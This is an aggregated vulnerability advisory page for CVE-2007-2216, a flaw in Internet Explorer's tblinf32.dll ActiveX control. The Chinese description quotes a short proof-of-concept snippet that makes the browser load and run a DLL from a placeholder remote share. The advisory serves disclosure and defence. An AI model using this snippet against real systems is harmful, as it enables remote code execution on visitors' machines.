CVE-2007-2216 (CNNVD-200708-221)
中文标题:
Microsoft Internet Explorer配置错误漏洞
英文标题:
The tblinf32.dll (aka vstlbinf.dll) ActiveX control for Internet Explorer 5.01, 6 SP1, and 7 uses an...
漏洞描述
中文描述:
Microsoft Internet Explorer(IE)是美国微软(Microsoft)公司的一款Windows操作系统附带的Web浏览器。 IE的tblinf32.dll ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。 IE中tblinf32.dll或vstlbinf.dll ActiveX控件没有正确地实现IObjectsafety。TlbInf32.dll是一组COM对象,允许Visual Basic和C++程序员访问类型库。该库实现了IObjectSafety: Report for Clsid: {8B217746-717D-11CE-AB5B-D41203C10000} RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data TypeLibInfoFromFile()函数用于打开文件并从中检索typelib信息: TypeLibInfoFromFile(ByVal FileName As String) As TypeLibInfo 这个函数会接受到DLL文件的webdav/smb共享,以便从远程服务器上的DLL检索信息。如果修改了TypeLibInfoFromFile()调用中的DLL文件将HelpStringDll属性定向到导出恶意DLLGetDocumentation函数的DLL,则在请求HelpString属性时就会执行这个函数。 <object width 00 height classid="CLSID:<CLASSID>" name=test></object> x= test.TypeLibInfoFromFile("\\IPADDRESS\SHARE\remote.dll") ' Call the remote DLLGetDocumentation function alert(x.Interfaces.Item(a).Members.Item(b).HelpString) 如果用户受骗访问了恶意站点的话就可能导致执行任意指令。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限,那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。"
英文描述:
The tblinf32.dll (aka vstlbinf.dll) ActiveX control for Internet Explorer 5.01, 6 SP1, and 7 uses an incorrect IObjectsafety implementation, which allows remote attackers to execute arbitrary code by requesting the HelpString property, involving a crafted DLL file argument to the TypeLibInfoFromFile function, which overwrites the HelpStringDll property to call the DLLGetDocumentation function in another DLL file, aka "ActiveX Object Vulnerability."
CWE类型:
标签:
受影响产品
| 厂商 | 产品 | 版本 | 版本范围 | 平台 | CPE |
|---|---|---|---|---|---|
| microsoft | internet_explorer | 5.01 | - | - |
cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*
|
| microsoft | internet_explorer | 6 | - | - |
cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*
|
| microsoft | internet_explorer | 7 | - | - |
cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*
|
解决方案
中文解决方案:
英文解决方案:
临时解决方案:
参考链接
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
exploitdb
exploitdb
cve.org
CVSS评分详情
AV:N/AC:M/Au:N/C:C/I:C/A:C
时间信息
利用信息
数据源详情
| 数据源 | 记录ID | 版本 | 提取时间 |
|---|---|---|---|
| CVE | cve_CVE-2007-2216 |
2025-11-11 15:17:52 | 2025-11-11 07:32:43 |
| NVD | nvd_CVE-2007-2216 |
2025-11-11 14:52:12 | 2025-11-11 07:41:29 |
| CNNVD | cnnvd_CNNVD-200708-221 |
2025-11-11 15:08:56 | 2025-11-11 07:49:19 |
| EXPLOITDB | exploitdb_EDB-30490 |
2025-11-11 15:05:56 | 2025-11-11 08:25:33 |
版本与语言
安全公告
变更历史
查看详细变更
- references_count: 9 -> 12
- tags_count: 0 -> 4
- data_sources: ['cnnvd', 'cve', 'nvd'] -> ['cnnvd', 'cve', 'exploitdb', 'nvd']
查看详细变更
- vulnerability_type: 未提取 -> 配置错误
- cnnvd_id: 未提取 -> CNNVD-200708-221
- data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
查看详细变更
- severity: SeverityLevel.MEDIUM -> SeverityLevel.CRITICAL
- cvss_score: 未提取 -> 9.3
- cvss_vector: NOT_EXTRACTED -> AV:N/AC:M/Au:N/C:C/I:C/A:C
- cvss_version: NOT_EXTRACTED -> 2.0
- affected_products_count: 0 -> 3
- data_sources: ['cve'] -> ['cve', 'nvd']